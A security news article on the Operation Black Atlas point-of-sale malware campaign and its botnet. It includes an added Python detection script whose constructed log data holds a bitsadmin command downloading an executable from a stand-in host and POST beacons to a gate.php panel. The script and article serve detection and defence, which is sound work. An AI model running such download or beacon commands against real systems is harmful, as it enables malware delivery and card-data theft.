Operation Black Atlas Continues to Compromise PoS Systems

Operation Black Atlas, a campaign aimed at infecting point of sale (PoS) systems around the world, has managed to infect more companies and is using the modular Gorynych/Diamond Fox botnet to exfiltrate data, Trend Micro researchers warn.

Earlier this month, the security company revealed that cybercriminals were using multiple tools to compromise businesses that use card payment systems, including those in healthcare and retail, and to infect targeted systems with various PoS malware, including the BlackPOS malware.

Trend Micro said the cybercriminals behind Operation Black Atlas are using a variety of pen testing tools to discover vulnerable systems, including brute force or dictionary attack tools, SMTP (Simple Mail Transfer Protocol) scanners, and remote desktop viewers. They used a “shotgun” approach to infiltrate networks by checking available ports on the Internet on multiple targets at once, the researchers said.

The operation was focused on spreading a variety of malware, including BlackPoS, also known as Kaptoxa, while the masterminds behind it were also looking to steal user credentials to sites that contain sensitive information, email accounts, and Facebook. The operation is aimed at small and medium-sized businesses across the globe, and appears to be successfully infecting targets across a variety of industries.

Most recently, the infection spread to a multi-state healthcare provider, dental clinics, a machine manufacturer, a technology company focusing on insurance services, a gas station that has a multi-state presence, and a beauty supply shop, Trend Micro said in a new blog post on the operation.

The security company also explains that the cybercriminals behind Black Atlas introduce PoS threats into the compromised systems by abusing a legitimate Windows function, the Background Intelligent Transfer Service (BITS), through its command-line client bitsadmin.exe. The service is used for transferring files to and from Microsoft, mostly for system updates, and its traffic is generally allowed through firewalls.

As part of this operation, bad actors use BITS to download NewPOSThings, a piece of malware that includes functions such as RAM scraper, keylogger, keep-alive reporting, and data transfer routines. Moreover, they load a variant of Neutrino or Kasidet, also with PoS card-scraping functionality, as well as CenterPOS, Project Hook, and PwnPOS in some cases.

The cybercriminals running Black Atlas also managed to build a replica of the Gorynych / Diamond Fox botnet malware and repurposed it to specifically look for the output file of the BlackPoS malware, which includes harvested credit card data. The modular botnet also includes plugins for getting screenshots, passwords, mails, and more.

The security researchers explain that Gorynych routines focus mainly on anti-analysis, information theft, and installation, and that the plugins provide it with additional functionality. The Diamond Fox builder has the keylogger and PoS grabber functionalities disabled by default, but they have been turned on as part of Operation Black Atlas.

After infection, Gorynych downloads its plugins and reports to its server via gate.php using HTTP POST, with its own user-agent string, which is set in the configuration file. The information is encrypted using a simple XOR operation, Trend Micro explained. The security researchers also extracted hashes, addresses, and other indicators related to Gorynych and included them in an IOC document, and they offer details on the entire Operation Black Atlas in a technical brief.
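Two of the behaviours described above, the bitsadmin.exe download of a PoS payload and the HTTP POST beacon to gate.php, can be turned into log-based detections. The following is an added example, not code from Trend Micro or from the report; it runs over constructed process-creation and web-proxy records, and the update-server allowlist and the browser user-agent pattern are assumptions an organisation would tune to its own environment.

```python
import re
from typing import Dict, List

# Constructed sample events (not from the report): Windows process-creation records
# and web-proxy records, as a SIEM might hold them after normalisation.
PROCESS_EVENTS = [
    {"host": "pos-01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 http://203.0.113.10/upd.exe C:\Users\Public\upd.exe"},
    {"host": "pos-02", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer wu http://wsus.corp.example/patch.cab C:\Windows\Temp\patch.cab"},
    {"host": "wks-07", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]
PROXY_EVENTS = [
    {"host": "pos-01", "method": "POST", "url": "http://198.51.100.7/panel/gate.php",
     "ua": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"},
    {"host": "pos-03", "method": "POST", "url": "http://198.51.100.7/panel/gate.php",
     "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/109.0"},
    {"host": "wks-07", "method": "GET", "url": "http://example.com/index.php", "ua": "Mozilla/5.0 Firefox/109.0"},
]

TRUSTED_UPDATE_HOSTS = {"wsus.corp.example"}  # assumption: the org's patch-server allowlist
BROWSER_UA = re.compile(r"Chrome/|Firefox/|Edg/|Safari/")  # assumption: crude "looks like a browser" check

def flag_bits_downloads(events: List[Dict], allowlist=TRUSTED_UPDATE_HOSTS) -> List[Dict]:
    """Flag bitsadmin /transfer jobs that pull a file from a host outside the update allowlist."""
    hits = []
    for ev in events:
        if not ev["image"].lower().endswith("bitsadmin.exe"):
            continue
        m = re.search(r"/transfer\s+\S+\s+(https?://([^/\s]+)\S*)", ev["cmdline"], re.I)
        if m and m.group(2).lower() not in allowlist:
            hits.append({"host": ev["host"], "rule": "bits_external_download", "url": m.group(1)})
    return hits

def flag_gate_beacons(events: List[Dict], browser_ua=BROWSER_UA) -> List[Dict]:
    """Flag HTTP POSTs to a gate.php endpoint sent with a user-agent that does not look like a browser."""
    hits = []
    for ev in events:
        if (ev["method"] == "POST" and ev["url"].lower().endswith("/gate.php")
                and not browser_ua.search(ev["ua"])):
            hits.append({"host": ev["host"], "rule": "gate_php_post_nonbrowser", "url": ev["url"], "ua": ev["ua"]})
    return hits

if __name__ == "__main__":
    for hit in flag_bits_downloads(PROCESS_EVENTS) + flag_gate_beacons(PROXY_EVENTS):
        print(hit)
```

On the constructed data only pos-01 is reported by both rules; a host appearing in both lists is the kind of overlap an analyst would prioritise for RAM-scraper triage.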

The security firm notes that companies threatened by this operation should assess their security posture and apply multiple PoS defense strategies, with network segmentation and isolation of the cardholder data environment from other networks considered a standard approach. Large organizations should eliminate unnecessary data and monitor the information that remains, while also ensuring through regular security checks that essential controls are running and that event logs are monitored.
